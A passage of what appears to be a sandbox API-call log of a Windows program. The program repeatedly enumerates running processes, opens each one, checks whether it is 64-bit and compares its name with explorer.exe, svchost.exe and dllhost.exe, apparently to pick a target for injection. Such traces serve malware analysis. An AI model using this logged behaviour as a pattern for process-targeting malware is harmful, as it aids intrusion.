Wow64Process=0x2cf764) returned 1 [0206.959] CloseHandle (hObject=0xec) returned 1 [0206.959] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0206.959] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0206.959] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0206.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0206.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0206.960] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.960] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.960] CloseHandle (hObject=0xec) returned 1 [0206.960] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0206.960] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0206.960] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0206.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0206.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0206.960] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.960] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.961] CloseHandle (hObject=0xec) returned 1 [0206.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0206.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0206.961] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0206.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0206.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0206.961] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.961] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.961] CloseHandle (hObject=0xec) returned 1 [0206.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0206.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0206.961] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0206.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0206.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0206.962] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.962] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.962] CloseHandle (hObject=0xec) returned 1 [0206.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0206.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0206.962] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0206.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0206.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0206.963] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.963] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.963] CloseHandle (hObject=0xec) returned 1 [0206.963] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0206.963] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0206.963] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0206.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0206.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0206.963] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.963] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.963] CloseHandle (hObject=0xec) returned 1 [0206.963] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0206.963] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0206.963] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0206.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0206.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0206.964] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.964] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.964] CloseHandle (hObject=0xec) returned 1 [0206.964] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0206.964] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0206.964] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0206.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0206.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0206.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0206.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0206.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0206.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0206.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0206.967] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0206.968] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.968] CloseHandle (hObject=0xec) returned 1 [0206.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0206.968] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.968] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.968] CloseHandle (hObject=0xec) returned 1 [0206.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0206.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0206.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0206.969] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.969] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.969] CloseHandle (hObject=0xec) returned 1 [0206.969] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0206.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0206.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.970] CloseHandle (hObject=0xec) returned 1 [0206.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0206.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0206.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.971] CloseHandle (hObject=0xec) returned 1 [0206.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0206.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0206.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0206.972] CloseHandle (hObject=0xec) returned 1 [0206.972] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0206.972] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0206.972] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0206.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0206.972] CloseHandle (hObject=0xe8) returned 1 [0206.972] Sleep (dwMilliseconds=0x3e8) [0208.025] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0208.027] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0208.027] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0208.027] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0208.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0208.028] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0208.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0208.028] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0208.029] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0208.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0208.029] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0208.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0208.030] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0208.030] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0208.030] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0208.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0208.031] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0208.031] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0208.031] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0208.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0208.032] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.032] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0208.032] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0208.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.033] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0208.033] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0208.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.034] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0208.034] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0208.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0208.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.035] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0208.035] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0208.036] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0208.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0208.036] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.036] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.036] CloseHandle (hObject=0xec) returned 1 [0208.036] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0208.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0208.037] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0208.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0208.037] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.037] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.037] CloseHandle (hObject=0xec) returned 1 [0208.037] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0208.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0208.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0208.038] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0208.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0208.039] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.039] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.039] CloseHandle (hObject=0xec) returned 1 [0208.039] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0208.039] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0208.039] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0208.039] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0208.040] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0208.040] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0208.040] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 